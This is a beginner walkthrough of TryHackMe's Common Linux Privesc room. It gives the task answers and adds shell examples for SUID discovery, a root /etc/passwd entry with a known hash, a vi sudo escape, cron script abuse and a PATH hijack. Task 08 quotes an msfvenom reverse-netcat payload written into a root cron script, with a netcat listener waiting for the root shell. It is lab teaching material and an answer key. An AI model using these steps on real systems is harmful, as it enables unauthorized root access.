THM | Common Linux Privesc

Shells and Privilege Escalation | Common Linux Privesc | Summary:

This series of walkthroughs aims to help out complete beginners with finishing the Complete Beginner path on the TryHackMe website. It is based on the learning content provided in the Common Linux Privesc room.


Disclaimer: Please note that this write-up is NOT intended to replace the original room or its content, but rather serve as supplementary material for those who are stuck and need additional guidance.

Task | 01 | Get Connected

Question 1: Deploy the machine

No answer needed

Task | 02 | Understanding Privesc

Question 1: Read the information about privilege escalation

No answer needed

Task | 03 | Direction of Privilege Escalation

Question 1: Understand the difference between Horizontal and Vertical privilege escalation.

No answer needed

Task | 04 | Enumeration

Question 1*: First, let's SSH into the target machine, using the credentials user3:password. This is to simulate getting a foothold on the system as a normal privilege user.

No answer needed

Question 2: What is the target's hostname?

polobox

Question 3: Look at the output of /etc/passwd how many user[x] are there on the system?

8

Question 4: How many available shells are there on the system?

4

Question 5: What is the name of the bash script that is set to run every 5 minutes by cron?

autoscript.sh

Question 6: What critical file has had its permissions changed to allow some users to write to it?

/etc/passwd

Question 7: Well done! Bear the results of the enumeration stage in mind as we continue to exploit the system!

No answer needed
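The checks behind Task 04, as an added example that is not part of the room: each function takes the file to inspect as an argument, so it can be exercised here against a constructed passwd and shells file (not the real polobox contents; the sample has 3 user[x] accounts, the box has 8) and then pointed at /etc/passwd and /etc/shells on the target.

```sh
#!/bin/sh
# Added example, not part of the room: the Task 04 enumeration checks as functions
# that take the file to inspect as an argument, so they can be exercised against a
# constructed sample and then pointed at /etc/passwd and /etc/shells on a target.
set -u

# Count accounts whose login name is user<N>.
count_userN_accounts() {
    grep -c '^user[0-9][0-9]*:' "$1" || true      # grep -c exits 1 on zero matches
}

# Count the login shells offered by the system: non-comment lines of /etc/shells.
count_shells() {
    grep -c '^/' "$1" || true
}

# Print "name:shell" for accounts that can get an interactive shell.
interactive_accounts() {
    awk -F: '$7 !~ /(nologin|false)$/ {print $1 ":" $7}' "$1"
}

# Exit 0 if the calling user can write the file; for /etc/passwd that is the Task 04 finding.
writable_by_me() {
    [ -w "$1" ]
}

# Constructed sample files (not the real polobox contents) for an offline run.
sample_passwd_file() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
user1:x:1001:1001:,,,:/home/user1:/bin/bash
user2:x:1002:1002:,,,:/home/user2:/bin/bash
user3:x:1003:1003:,,,:/home/user3:/bin/bash
mysql:x:111:115:MySQL Server,,,:/nonexistent:/bin/false
EOF
    echo "$f"
}

sample_shells_file() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
# /etc/shells: valid login shells
/bin/sh
/bin/bash
/bin/rbash
/bin/dash
EOF
    echo "$f"
}

# On the target, the same checks against the live system:
#   hostname
#   count_userN_accounts /etc/passwd
#   count_shells /etc/shells
#   interactive_accounts /etc/passwd
#   writable_by_me /etc/passwd && echo '/etc/passwd is writable'
#   find / -writable -type f ! -path '/proc/*' 2>/dev/null   # wider sweep for the same class of bug
```

The find sweep in the last comment is the general form of Question 6: a world- or group-writable file that root later reads or executes is the condition every later task on this page abuses, so it is worth listing all of them once rather than only checking /etc/passwd.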

Task | 05 | Abusing SUID/GUID Files

Question 1: What is the path of the file in user3's directory that stands out to you?

/home/user3/shell

Question 2: We know that "shell" is an SUID bit file, therefore running it will run the script as a root user! Let's run it! We can do this by running: ./shell

No answer needed

Question 3: Congratulations! You should now have a shell as root user, well done!

No answer needed
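How a file like /home/user3/shell is found in the first place, as an added example that is not part of the room. The scratch tree it builds is constructed for the demonstration; the real hits on a target are root-owned compiled binaries, which is also why the room's "shell" works while a setuid shell script would not.

```sh
#!/bin/sh
# Added example, not part of the room: locating setuid files and seeing why one matters.
# A file with mode 4xxx owned by root executes with root's effective UID whoever runs it;
# that is the whole trick behind /home/user3/shell.
set -u

# Every regular file below a directory with the setuid bit set. On a target run
# find_suid / ; unreadable directories are silenced so the hits are easy to read.
find_suid() {
    find "$1" -type f -perm -4000 2>/dev/null
}

# Same idea for setgid (the "GUID" of the task title): these run with the group's EGID.
find_sgid() {
    find "$1" -type f -perm -2000 2>/dev/null
}

# "<owner> <octal mode>" so the root-owned + setuid combination is visible at a glance.
owner_and_mode() {
    stat -c '%U %a' "$1"
}

# Scratch tree with one setuid file and one plain file so the finders can be run as a
# normal user (you may set u+s on your own files). The sample is a shell script only to
# have something to mark: Linux ignores setuid on interpreted scripts, so on a real
# box the hits worth looking at are root-owned compiled binaries such as the room's "shell".
sample_tree() {
    d=$(mktemp -d)
    printf '#!/bin/sh\nid\n' > "$d/shell"
    printf '#!/bin/sh\nid\n' > "$d/plain"
    chmod 4755 "$d/shell"
    chmod 0755 "$d/plain"
    echo "$d"
}

# On the target:  find_suid / | while read -r f; do echo "$(owner_and_mode "$f") $f"; done
```

Anything in that list that is owned by root and not a standard system binary (passwd, su, sudo, mount and a handful of others are expected) deserves a closer look; an unfamiliar file in a user's home directory, as here, is the obvious outlier.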

Task | 06 | Exploiting Writeable /etc/passwd

Question 1: First, let's exit out of root from our previous task by typing "exit". Then use "su" to swap to user7, with the password "password"

No answer needed

Question 2: Having read the information above, what direction privilege escalation is this attack?

vertical

Question 3: Before we add our new user, we first need to create a compliant password hash to add! We do this by using the command: openssl passwd -1 -salt [salt] [password]. What is the hash created by using this command with the salt, "new" and the password "123"?

$1$new$p7ptkEKU1HnaHpRtzNizS1

Question 4: Great! Now we need to take this value, and create a new root user account. What would the /etc/passwd entry look like for a root user with the username "new" and the password hash we created before?

new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash

Question 5: Great! Now you've got everything you need. Just add that entry to the end of the /etc/passwd file!

No answer needed

Question 6: Now, use "su" to login as the "new" account, and then enter the password. If you've done everything correctly- you should be greeted by a root prompt! Congratulations!

No answer needed
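The Task 06 steps end to end, as an added example that is not part of the room: generate the hash the same way the room does, compose the entry, and check the result before and after appending. The passwd file it writes to is a constructed stand-in so the flow can be run offline; on the target the same functions are pointed at /etc/passwd.

```sh
#!/bin/sh
# Added example, not part of the room: build the Task 06 entry, check it, and only then
# append it. Field layout is name:hash:uid:gid:gecos:home:shell. Authentication uses a
# hash placed in field 2 directly and only consults /etc/shadow when that field is "x",
# which is why a writable /etc/passwd is enough on its own.
set -u

# MD5-crypt hash, as the room generates it.
md5crypt_hash() {
    openssl passwd -1 -salt "$1" "$2"
}

# A UID 0 / GID 0 entry for the given login name and hash.
root_passwd_entry() {
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$1" "$2"
}

# Every UID 0 account other than root in a passwd-format file. Non-empty output is the
# exact signal a defender (or a file-integrity monitor) should raise on.
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" {print $1}' "$1"
}

# Append the entry only if the file really is writable; report otherwise.
append_if_writable() {
    file=$1
    entry=$2
    if [ -w "$file" ]; then
        printf '%s\n' "$entry" >> "$file"
        return 0
    fi
    echo "not writable: $file" >&2
    return 1
}

# Constructed stand-in for /etc/passwd so the flow can be run without touching the real file.
sample_passwd_file() {
    f=$(mktemp)
    printf 'root:x:0:0:root:/root:/bin/bash\nuser7:x:1007:1007:,,,:/home/user7:/bin/bash\n' > "$f"
    echo "$f"
}

# On the target the whole thing is:
#   entry=$(root_passwd_entry new "$(md5crypt_hash new 123)")
#   append_if_writable /etc/passwd "$entry" && su new     # password: 123
```

Appending with a trailing newline matters: if the existing file does not end in one, a bare echo of the entry would glue it onto the previous line and the new account would never parse.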

Task | 07 | Escaping Vi Editor

Question 1: First, let's exit out of root from our previous task by typing "exit". Then use "su" to swap to user8, with the password "password"

No answer needed

Question 2: Let's use the sudo -l command, what does this user require (or not require) to run vi as root?

NOPASSWD

Question 3: So, all we need to do is open vi as root, by typing sudo vi into the terminal.

No answer needed

Question 4: Now, type :!sh to open a shell!

No answer needed
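Reading sudo -l output mechanically, as an added example that is not part of the room. The sample text is constructed to resemble sudo's format: the vi line reflects the Task 07 answer, the less line and the Defaults block are invented for contrast and are not claimed to be what polobox prints.

```sh
#!/bin/sh
# Added example, not part of the room: pull the commands you may run as root out of
# "sudo -l" output and flag which need no password. The sample text is constructed
# to resemble sudo's format: the vi line matches the Task 07 finding, the less line is
# invented for contrast.
set -u

SUDO_L_SAMPLE='Matching Defaults entries for user8 on polobox:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user8 may run the following commands on polobox:
    (root) NOPASSWD: /usr/bin/vi
    (root) /usr/bin/less'

# Read "sudo -l" output on stdin; print "NOPASSWD <cmd>" or "PASSWD <cmd>" for every
# rule line, i.e. every line that starts with a "(runas)" specification.
root_commands() {
    awk '/^[ \t]*\(/ {
        sub(/^[ \t]*\([^)]*\)[ \t]*/, "")               # drop "(root) "
        if (sub(/^NOPASSWD:[ \t]*/, "")) print "NOPASSWD " $0
        else                               print "PASSWD " $0
    }'
}

# Usage on the target:  sudo -l | root_commands
# A NOPASSWD editor is a direct root shell:  sudo vi  then  :!sh
```

Both classes are worth listing: a PASSWD entry still works once you know the user's password, which in this room you do. The secure_path in the Defaults block is also why the PATH trick from Task 09 does not carry into commands run through sudo.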

Task | 08 | Exploiting Crontab

Question 1: First, let's exit out of root from our previous task by typing "exit". Then use "su" to swap to user4, with the password "password"

No answer needed

Question 2: Now, on our host machine, let's create a payload for our cron exploit using msfvenom.

No answer needed

Question 3: What is the flag to specify a payload in msfvenom?

-p

Question 4: Create a payload using: msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R

No answer needed

Question 5: What directory is the "autoscript.sh" under?

/home/user4/Desktop

Question 6: Let's replace the contents of the file with our payload using: echo [MSFVENOM OUTPUT] > autoscript.sh

No answer needed

Question 7: After copying the code into autoscript.sh file we wait for cron to execute the file, and start our netcat listener using: nc -lvnp 8888 and wait for our shell to land!

No answer needed

Question 8: After about 5 minutes, you should have a shell as root land in your netcat listening session! Congratulations!

No answer needed
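The condition Task 08 relies on, checked mechanically, as an added example that is not part of the room: a root-owned cron job whose script the current user can edit. The crontab and the files it points at are constructed in a scratch tree (the autoscript.sh body is a placeholder, not the real one); on the target the same functions are run against /etc/crontab.

```sh
#!/bin/sh
# Added example, not part of the room: find cron jobs that run as root and test whether
# the current user can write the program they execute. That is the condition Task 08
# abuses: whatever is in autoscript.sh runs as root on the next */5 tick.
set -u

# System crontab format: min hour dom mon dow USER command...  Print the command
# path of every job owned by root (comments and variable assignments are skipped).
root_cron_targets() {
    awk '!/^[ \t]*#/ && NF >= 7 && $6 == "root" {print $7}' "$1"
}

# Of those, print the ones the calling user can modify.
writable_root_cron_targets() {
    root_cron_targets "$1" | while IFS= read -r target; do
        if [ -w "$target" ]; then printf '%s\n' "$target"; fi
    done
}

# Constructed crontab + files in a scratch tree (not the real /etc/crontab). The
# autoscript.sh job mirrors the room; the backup job is invented to show a target the
# user cannot write (here because it does not exist).
sample_cron_env() {
    d=$(mktemp -d)
    mkdir -p "$d/home/user4/Desktop"
    printf '#!/bin/bash\n/bin/ls /home/user4\n' > "$d/home/user4/Desktop/autoscript.sh"  # placeholder body
    chmod 755 "$d/home/user4/Desktop/autoscript.sh"
    cat > "$d/crontab" <<EOF
# /etc/crontab: system-wide crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

*/5 * * * * root $d/home/user4/Desktop/autoscript.sh
0 3 * * * root $d/opt/backup.sh
EOF
    echo "$d"
}

# On the target:  writable_root_cron_targets /etc/crontab
# Also worth the same check: /etc/cron.d/* and the scripts under /etc/cron.{hourly,daily}
```

Two practical points for the exploit itself. Start nc -lvnp 8888 before the next five-minute boundary, not after: the reverse shell connects out when cron fires, and if nothing is listening the connection is simply refused and you wait another five minutes. And because the job runs under cron's own PATH line rather than your shell's, the PATH manipulation from Task 09 has no effect here; overwriting the script is what makes this one work.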

Task | 09 | Exploiting PATH Variable

Question 1: Going back to our local SSH session (not the netcat root session, which you can close now), let's exit out of root from our previous task by typing "exit". Then use "su" to swap to user5, with the password "password".

No answer needed

Question 2: Let's go to user5's home directory, and run the file "script". What command do we think that it's executing?

ls

Question 3: Now we know what command to imitate, let's change directory to "tmp".

No answer needed

Question 4: Now we're inside tmp, let's create an imitation executable. The format for what we want to do is: echo "[whatever command we want to run]" > [name of the executable we're imitating]. What would the command look like to open a bash shell, writing to a file with the name of the executable we're imitating?

echo "/bin/bash" > ls

Question 5: Great! Now we've made our imitation, we need to make it an executable. What command do we execute to do this?

chmod +x ls

Question 6: Now, we need to change the PATH variable, so that it points to the directory where we have our imitation "ls" stored! We do this using the command export PATH=/tmp:$PATH.

  • Note that this will open a bash prompt every time you type "ls" in this session. If you need to list files before you finish the exploit, call the real binary directly with "/bin/ls".
  • Once you've finished the exploit, exit out of root and run export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:$PATH to put the standard directories ahead of /tmp again, so "ls" resolves to the real binary. The /tmp entry is still at the end of PATH after this; logging out and back in removes it entirely.

No answer needed

Question 7: Now, change directory back to user5's home directory.

No answer needed

Question 8: Now, run the "script" file again, you should be sent into a root bash prompt! Congratulations!

No answer needed
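The Task 09 hijack reproduced in a scratch directory, beside the one-line fix, as an added example that is not part of the room. The two victim scripts and the fake ls are constructed for the demonstration: the real "script" on polobox is a setuid binary, and the room's impostor spawns /bin/bash, whereas this one only prints a marker so the effect is visible without root.

```sh
#!/bin/sh
# Added example, not part of the room: the Task 09 PATH hijack reproduced in a scratch
# directory, alongside the one-line fix. A program that invokes "ls" by bare name lets
# PATH decide which ls runs; a program that invokes /bin/ls does not.
set -u

# Two victims and one impostor. The real "script" binary on polobox is setuid root;
# here both victims are plain scripts, and the fake ls prints a marker instead of
# spawning /bin/bash, so the effect is visible without needing root.
sample_lab() {
    d=$(mktemp -d)
    mkdir "$d/bin"
    printf '#!/bin/sh\nls\n' > "$d/victim_bare"        # vulnerable: relative lookup
    printf '#!/bin/sh\n/bin/ls\n' > "$d/victim_abs"    # fixed: absolute path
    printf '#!/bin/sh\necho HIJACKED\n' > "$d/bin/ls"  # the impostor (room: echo "/bin/bash" > ls)
    chmod +x "$d/victim_bare" "$d/victim_abs" "$d/bin/ls"
    echo "$d"
}

# Run a command with the impostor directory first in PATH. Equivalent to the room's
# export PATH=/tmp:$PATH, but scoped to the one child process so the current shell
# keeps a sane PATH and no reset is needed afterwards.
run_with_hijacked_path() {
    lab=$1; shift
    PATH="$lab/bin:$PATH" "$@"
}

# Usage:
#   d=$(sample_lab)
#   run_with_hijacked_path "$d" "$d/victim_bare"   # prints HIJACKED
#   run_with_hijacked_path "$d" "$d/victim_abs"    # prints a real directory listing
```

The per-process form is also the cleaner way to run the real exploit: PATH=/tmp:$PATH /home/user5/script does the same as the export in Question 6 without leaving /tmp on your PATH afterwards. From the defender's side the fix is the second victim: programs that run with elevated privilege should call helpers by absolute path, or reset PATH to a known value before doing anything else.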

Task | 10 | Expanding Your Knowledge

Question 1: Well done, you did it!

No answer needed